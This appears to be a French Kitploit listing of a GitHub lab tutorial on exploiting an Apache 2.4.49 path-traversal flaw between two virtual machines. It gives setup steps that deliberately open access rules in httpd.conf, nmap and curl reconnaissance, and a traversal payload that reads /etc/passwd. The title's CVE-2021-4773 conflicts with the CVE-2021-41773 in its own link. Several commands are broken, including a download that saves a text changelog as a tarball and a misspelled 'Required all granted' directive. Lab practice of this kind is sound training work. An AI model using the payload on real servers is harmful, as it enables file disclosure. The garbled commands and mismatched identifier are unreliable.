Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-4773 — ceci est un exemple pratique de la façon d'exploiter la vulnérabilité CVE-2021-4773 avec une machine virtuelle | Kitploit
Outils/GitHubGitHub/alexs18/cve-2021-4773
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubalexs18/cve-2021-4773

CVE-2021-4773

ceci est un exemple pratique de la façon d'exploiter la vulnérabilité CVE-2021-4773 avec une machine virtuelle

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-4773

ceci est un exemple pratique de la manière d'exploiter la vulnérabilité CVE-2021-4773 avec une machine virtuelle

pour ce tutoriel, vous avez besoin des éléments suivants

  • machine virtuelle comme kali linux
  • machine virtuelle comme ubuntu server
  • installer apache version 2.4.49

alors commençons quand vous avez 2 machines virtuelles en cours d'exécution, vous allez installer apache version 2.4.49 avec une archive de dépôt vous pouvez trouver cette version ici https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Installer et configurer la version vulnérable sur ubuntu server

1 la première fois sur votre machine virtuelle serveur, vous devez exécuter la commande suivante

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  ou wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 la deuxième fois, vous devez décompresser cette version d'apache comme ceci

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 installer les paquets suivants

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 exécuter le fichier exécutable dans le répertoire principal (nom du fichier configure) en utilisant le flag pour spécifier le répertoire d'installation

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 compiler la version vulnérable

root@kitploit:~
make

6 installer la version vulnérable

root@kitploit:~
make install

7 vérifier la version

root@kitploit:~
ls /usr/local/apache2

8 démarrer le processus

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 vérifier le processus

root@kitploit:~
ps aux | grep httpd

10 configurer la vulnérabilité trouver le fichier /usr/local/apache2/conf/httpd.conf et configurer le répertoire admin trouver la balise directory et remplacer Require all denied par

root@kitploit:~
  Required all granted
  

trouver la balise Files .ht* et remplacer Require all denied par

root@kitploit:~
  Required all granted

le premier changement permet l'exploitation de la vulnérabilité dans l'environnement local et le second l'exposition dans l'environnement réel

Exploiter la vulnérabilité sur kali linux

1 scanner l'adresse IP avec nmap avec la commande suivante

root@kitploit:~
nmap -sV ip_address

2 faire un curl ou wget pour tester le serveur apache

root@kitploit:~
curl ip_address ou faire wget ip_address

3 voir comment exploiter la vulnérabilité sur la page suivante si vous voulez comprendre la syntaxe

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

ou utilisez simplement la payload suivante

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Télécharger l’outil